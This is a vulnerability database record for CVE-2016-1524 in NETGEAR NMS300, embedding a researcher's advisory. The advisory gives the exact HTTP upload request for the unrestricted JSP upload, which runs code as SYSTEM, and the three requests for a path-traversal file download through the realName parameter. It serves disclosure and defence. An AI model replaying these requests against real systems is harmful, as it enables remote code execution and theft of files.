ID

VAR-201602-0192

CVE

CVE-2016-1524

TITLE

Netgear Management System NMS300 contains arbitrary file upload and path traversal vulnerabilities

DESCRIPTION

Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability enables authenticated users to download arbitrary files. ( Dot dot ) including realName An arbitrary file may be read through the parameter. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable. >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 04/02/2016 / Last updated: 04/02/2016 >> Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network." >> Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name" [name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Hello World Example</title> </head> <body> <h2>A Hello World Example of JSP.</h2> </body> </html> ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3-- #2 Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 Three steps need to be taken in order to exploit this vulnerability: a) Add a configuration image, with the realName parameter containing the path traversal to the target file: POST /data/config/image.do?method=add HTTP/1.1 realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000 Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"} c) Download the file with the imageId obtained in step 2: GET /data/config/image.do?method=export&imageId=<ID> >> Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. >> References: [1] https://www.kb.cert.org/vuls/id/777024 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

specific network environment

TYPE

lack of information

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Pedro Ribeiro of Agile Information Security.

SOURCES

LAST UPDATE DATE

2024-11-23T22:52:41.712000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE